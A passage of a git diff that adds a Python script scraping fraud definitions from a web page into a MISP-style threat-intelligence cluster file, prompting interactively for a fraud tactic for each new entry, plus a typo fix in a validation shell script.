+ for synonym in cluster['meta']['synonyms']:
+ mapping[synonym.lower()] = cluster['uuid']
+ except KeyError:
+ pass
+
+changed = False
+soup = BeautifulSoup(response.content, 'lxml')
+entry_content = soup.find('div', class_='entry-content')
+t_first = entry_content.find('table')
+p_start = t_first.find_previous_sibling()
+for child in entry_content.children:
+ if 'p' == child.name and child.find('strong'):
+ # new category
+ category = string.capwords(child.text)
+ elif 'table' == child.name:
+ # new sub-category with entries to parse
+ sub_category = string.capwords(child.find('th').text.split('\n')[0])
+ # print(f'{category} - {sub_category}')
+ for tr in child.find_all('tr'):
+ try:
+ k, v = tr.find_all('td')
+ except ValueError:
+ continue # skip header row
+ value = k.text.strip()
+ description = v.text.strip()
+ # check by value or synonym if cluster is already known, and skip known
+ existing_uuid = mapping.get(value.lower())
+ if existing_uuid:
+ print(f'{category} # {sub_category} # {value} is already known as {existing_uuid}')
+ continue
+ # prompt as for a new cluster meta kill_chain is not known
+ print('Found new record:')
+ print(f' {category} # {sub_category} # {value} # {description}')
+ while True:
+ tactic = input(f'What is the right fraud-tactic? options are {tactics_options}\n> ')
+ if tactic.strip() in tactics_options:
+ tactic = tactic.strip()
+ break
+ elif any(option.startswith(tactic.strip()) for option in tactics_options):
+ for option in tactics_options:
+ if option.startswith(tactic.strip()):
+ tactic = option
+ print(f'Chosen: {tactic}')
+ found = True
+ break
+ break
+ else:
+ print("Given option is not in the list. Please input again.")
+
+ cluster = {
+ 'value': value,
+ 'description': description,
+ 'uuid': str(uuid.uuid5(uuid.UUID("9319371e-2504-4128-8410-3741cebbcfd3"), value)),
+ 'meta': {
+ 'refs': ['https://www.association-secure-transactions.eu/industry-information/fraud-definitions/'],
+ 'kill_chain': [f'fraud-tactics:{tactic}'],
+ }
+ }
+ json_data['values'].append(cluster)
+ changed = True
+
+if changed:
+ json_data['version'] += 1
+ with open(os.path.join('..', 'clusters', 'attck4fraud.json'), 'w') as f:
+ json.dump(json_data, f, indent=2, sort_keys=True, ensure_ascii=False)
+ f.write('\n')
+
+print("All done, please don't forget to ./jq_all_the_things.sh, commit, and then ./validate_all.sh.")
diff --git a/validate_all.sh b/validate_all.sh
index ab9b473..0a4183b 100755
--- a/validate_all.sh
+++ b/validate_all.sh
@@ -85,5 +85,7 @@ do
echo ''
done
-# check for empyt strings in clusters
+# check for empty strings in clusters
python3 -m tools.chk_empty_strings
+
+echo "If you see this message, all is probably well."
\ No newline at end of file